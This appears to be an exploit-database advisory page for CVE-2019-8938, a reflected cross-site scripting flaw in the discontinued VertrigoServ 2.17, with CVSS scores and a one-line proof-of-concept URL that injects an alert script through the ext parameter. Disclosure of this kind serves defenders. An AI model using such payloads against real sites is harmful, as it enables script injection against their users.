VertrigoServ 2.17 Cross Site Scripting

2019.02.22

Credit: Rafael Pedrero

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2019-8938

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

<!--
# Exploit Title: Cross Site Scripting in VertrigoServ 2.17
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://vertrigo.sf.net
# Software Link: http://vertrigo.sf.net
# Version: VertrigoServ 2.17
# Tested on: All
# CVE : CVE-2019-8938
# Category: webapps

1. Description

VertrigoServ 2.17 allows XSS via the /inc/extensions.php ext parameter.
NOTE: This product is discontinued.


2. Proof of Concept

http://127.0.0.1/inc/extensions.php?ext=<scrript>alert(1)</script>

3. Solution:

The product is discontinued. Update last version

-->

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

VertrigoServ 2.17 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

VertrigoServ 2.17 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.